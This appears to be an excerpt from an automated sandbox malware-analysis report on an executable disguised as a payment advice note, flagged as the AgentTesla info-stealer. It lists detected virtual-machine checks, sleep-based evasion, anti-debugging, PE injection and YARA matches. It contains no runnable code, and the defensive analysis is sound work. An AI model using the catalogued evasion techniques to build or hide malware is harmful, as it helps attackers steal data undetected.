                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion:

                    barindex
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEWindow / User API: threadDelayed 597Jump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeWindow / User API: threadDelayed 471Jump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7084Thread sleep count: 263 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7084Thread sleep count: 597 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -59406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -52094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -38094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -58312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -57406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -56312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -55406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -55000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -54812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -54094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -53906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -53000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -52812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -52594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -51906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -51500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE TID: 7068Thread sleep time: -51312s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 6756Thread sleep count: 471 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -58500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -57594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -56500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -55188s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -55000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -53688s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -53000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -52594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -51500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -50594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -49500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -48594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -47094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -44000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -43594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -43188s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -42688s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -42500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -42094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -41188s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -41000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -40500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -40094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -39688s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -39188s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -39000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -38594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -38094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -37500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -37000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -36594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -35500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -35094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -34594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -34000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -33500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -33094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -32688s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -32000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -31594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -31094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -30688s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -30500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe TID: 7048Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXELast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeLast function: Thread delayed
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.938935829.0000000005610000.00000002.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.936208812.0000000005210000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.929586896.00000000006FF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.938935829.0000000005610000.00000002.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.936208812.0000000005210000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.938935829.0000000005610000.00000002.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.936208812.0000000005210000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.938935829.0000000005610000.00000002.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.936208812.0000000005210000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0048A4D8 LdrInitializeThunk,2_2_0048A4D8
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0040ADB0 GetProcessHeap,HeapFree,2_2_0040ADB0
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040E61C
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00416F6A
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_004123F1 SetUnhandledExceptionFilter,11_2_004123F1
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEMemory written: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeMemory written: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess created: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeJump to behavior
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.932503045.0000000000C00000.00000002.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.929332992.0000000000B40000.00000002.00000001.sdmpBinary or memory string: Program Manager
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.932503045.0000000000C00000.00000002.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.929332992.0000000000B40000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.932503045.0000000000C00000.00000002.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.929332992.0000000000B40000.00000002.00000001.sdmpBinary or memory string: Progman
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.932503045.0000000000C00000.00000002.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.929332992.0000000000B40000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: GetLocaleInfoA,2_2_00417A20
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: GetLocaleInfoA,11_2_00417A20
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_00412A15
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_05A64C94 GetUserNameW,11_2_05A64C94
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 0000000B.00000002.932033702.00000000021F4000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.767263953.00000000004C1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.935842915.0000000004F00000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.935435728.0000000003471000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.933607178.0000000002400000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.934613196.0000000003531000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.933280290.0000000002234000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.935490984.0000000004970000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.694028712.00000000006BD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.937725779.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE PID: 4460, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Owdpdrv.exe PID: 4800, type: MEMORY
                    Source: Yara matchFile source: 11.2.Owdpdrv.exe.4f00000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.4ec0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.2400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.2400000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Owdpdrv.exe.4f00000.4.raw.unpack, type: UNPACKEDPE
